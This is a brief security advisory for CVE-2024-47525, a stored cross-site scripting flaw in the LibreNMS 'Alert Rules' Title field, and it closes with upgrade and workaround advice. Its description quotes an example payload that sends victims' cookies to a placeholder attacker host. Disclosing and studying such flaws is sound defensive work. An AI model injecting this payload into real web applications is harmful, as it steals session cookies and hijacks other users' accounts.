CVE-2024-47525

Name of the Vulnerable Software and Affected Versions LibreNMS versions prior to 24.9.0

Description A Stored Cross-Site Scripting (XSS) vulnerability in the "Alert Rules" feature allows authenticated users to inject arbitrary JavaScript through the "Title" field. This can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. The vulnerability occurs when creating an alert rule, as the application does not properly sanitize user inputs in the "Title" field. For example, a payload like test1'' autofocus onfocus="document.location='https://<attacker-url>/logger.php?c='+document.cookie" can be used to trigger the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.

Recommendations For versions prior to 24.9.0, update to 24.9.0 or later to stay protected. As a temporary workaround, consider restricting access to the "Alert Rules" feature until the issue is resolved. Avoid using the name field in the "Alert Rules" feature to inject malicious JavaScript code. Restrict the use of the title field to minimize the risk of exploitation.